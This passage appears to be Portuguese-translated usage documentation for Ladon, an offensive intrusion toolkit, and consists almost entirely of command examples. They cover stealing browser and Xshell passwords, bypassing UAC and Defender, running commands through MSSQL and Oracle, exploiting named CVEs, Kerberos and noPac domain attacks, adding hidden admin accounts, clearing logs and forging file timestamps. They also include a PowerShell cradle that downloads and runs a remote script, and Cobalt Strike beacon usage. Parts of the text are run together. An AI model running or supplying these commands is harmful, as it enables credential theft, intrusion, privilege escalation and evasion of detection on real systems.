Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://
##### 181 Http/S obter domínios de páginas da web```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https 扫描IP时添加https://
Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

##### 183 Senhas do Firefox\Cookie\Leitura do histórico```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe
##### 185 GetPwd suporta leitura de senhas de Navicat, TeamView, Xshell, SecureCRT```Bash
Ladon GetPwd
Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan
##### 187 XshellPwd Leitor de senhas do Xshell```Bash
Ladon XshellPwd
Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684
##### 189 MssqlCmd Execução remota de comandos SQL Server, versão SQL, informações do SO xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami
##### 191 CVE-2018-14847 Leitura de senha do Mikrotik RouterOS 6.29-6.42```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan
##### 193 MSNSwitchPwd CVE-2022-32429 Leitura de senha do roteador MSNSwitch```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd
##### 195 Detecção de versão do WebLogic via protocolo T3```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info
Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan
##### 197 VulScan PocScan Detecção de múltiplas vulnerabilidades remotas```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan
##### 199 JoomlaPwd CVE-2023-23752 Leitura não autorizada de senha de banco de dados do site```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan
##### 201 Detectar versão do Citrix Gateway```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer
##### 203 Contornar Defender para executar PowerShell```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public
##### 205 Limpar logs de operação Desabilitar registro de logs do .NET```Bash
Ladon Clslog
Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo
##### 207 Mini servidor FTP, (suporta comandos ftp nativos do windows/Linux para upload e download de arquivos)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
Ladon Tcp 8080 Ladon TcpServer 80
##### 209 monitorar dados de pacotes UDP salvar em TXT e HEX como protocolos DNS, SNMP, etc.```Bash
Ladon UdpServer 8080
Ladon Udp 161
Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338
##### 211 CVE-2022-36537 Server Backup Manager Detecção de vulnerabilidade RCE não autorizada (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml
##### 213 Desativar completamente SMB, desativar porta 445 para bloquear 0day, movimento lateral, ataques de relé, etc.```Bash
Ladon CloseSMB
Ladon DisService Spooler Ladon DisableService Spooler
##### 215 Parar o serviço especificado```Bash
Ladon StopService Spooler
Ladon OpenTCP 445 Ladon OpenUDP 161
##### 217 Bloquear porta Interceptar porta```Bash
Ladon CloseTCP 445
Ladon CloseUDP 161
Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat
##### 219 Escalação de privilégio RunSystem: de Administrador para SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
Ladon RunUser cmd.exe Ladon RunUser c:\1.exe
##### 221 GodPotato escalada de privilégios Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan
##### 223 hikvision Hikvision detecção de vulnerabilidade CVE-2017-7921```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
Ladon HikvisionDecode configurationFile
##### 225 CmdShell dedicado a testes do Ladon```Bash
Ladon web 800 cmd
Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami
##### 227 Ver Administradores de Domínio```Bash
Ladon QueryAdminDomain
Ladon QueryDomain
##### 229 Detecção de broadcast do protocolo Mndp para informações de roteadores Mikrotik na mesma sub-rede```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p
##### 231 RunCmd/Cmd Executar comando Cmd / suporta b64cmd```Bash
Ladon cmd whoami
Ladon b64cmd d2hvYW1p
Ladon LoginLog Ladon EventLog
##### 233 Apache RocketMQ CVE-2023-33246 EXP de vulnerabilidade de execução remota de comandos```Bash
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
Ladon BypassAV py xor anyNet.exe
##### 235 Elevação de privilégio para system no Win11/2022```Bash
Ladon McpPotato whoami
Ladon Exe2Hex 1.exe
##### 237 EXE para Base64, comando CMD para escrever em arquivo```Bash
Ladon Exe2B64 1.exe
Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer
##### 239 SharpGPO - ferramenta de movimento lateral via Política de Grupo para penetração de domínio```Bash
Ladon SharpGPO
Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"
Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo
Ladon SharpGPO --Action NewGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
Ladon IisInfo
##### 241 Servidor Web Especializado em Penetração com Deserialização LDAP```Bash
Ladon web 800 ldap=192.168.1.8:800
Ladon web 800 rmi=192.168.1.8
##### 243 API adicionar administrador (ignorar sistema net, net1 desabilitado)```Bash
Ladon AddAdmin admin$ 123456
Ladon AddUser admin$ 123456
##### 245 API deletar usuário (ignorar desativação do sistema net, net1.exe)```Bash
Ladon DelUser admin$
Por exemplo, solicitação TGT/solicitação ST/AS-REP Roasting/Kerberoasting/ataques de delegação/Golden Ticket/Silver Ticket/Diamond Ticket/Sapphire Ticket, etc.```Bash Ladon Rubeus
##### 247 noPac penetração de domínio elevação de privilégio no domínio CVE-2021-42287/CVE-2021-42278```Bash
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter
/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation
Examples:
Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
Ladon SharpGPOAbuse
##### 249 SharpSphere interage com o sistema operacional convidado de máquinas virtuais gerenciadas pelo vCenter e executa comandos```Bash
Ladon SharpSphere
No verb selected.
dump Snapshot and download memory dump file
list List all VMs managed by this vCenter
execute Execute given command in target VM
c2 Run C2 using C3's VMwareShareFile module
upload Upload file to target VM
download Download file from target VM
help Display more information on a specific command.
version Display version information.
Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==
##### 251 Dcom execução remota de comandos via ShellWindows```Bash
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==
##### 253 Smtp Ntlm Detecção de informações do sistema (portas 25, 465, 587)```Bash
Ladon 192.168.1.8/24 SmtpInfo
Ladon 192.168.1.8/24 HttpInfo
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
Ladon DomainLog -d 7
Ladon DomainLog -h ip -d 7
Ladon DomainLog -h ip -d 7 -grep user
Ladon DomainLog -h ip -u username -p password -d 7
Ladon DomainLog -h ip -u username -p password -d 7 -all
Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res
ult.txt
##### 257 Verificar se o usuário é administrador do Lotus```Bash
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
Ladon HtaSer Ladon HtaSer 8080
##### 259 ConfVer ConfluenceVer detectar versão do Confluence```Bash
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
Ladon FindAD Ladon pveFindADUser
##### 261 Ferramenta de escalonamento de privilégios remoto do Oracle Database Driver oficial >=.net 4.8```Bash
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami
##### BuildCS compilação dinâmica de arquivos de código C#```Bash
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
Usage: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"
##### Modificar tempo do arquivo Copiar tempo do arquivo```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe
powershell Import-Module .\Ladon.ps1 Ladon OnlinePC
#### 0x002 Execução Local Não Interativa```Bash
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"
#### 0x004 Bypass da execução da política padrão do PowerShell```Bash
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'
### Cobalt Strike Ladon.ps1
CS Beacon detecta hosts ativos```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo
CS Beacon Varredura de portas personalizada```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'
CS Beacon MS17010 - Detecção de vulnerabilidade```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010
=======================================================
http://k8gege.org/Ladon/example-en.html
Última versão em small seal ring: http://k8gege.org/Ladon/update.txt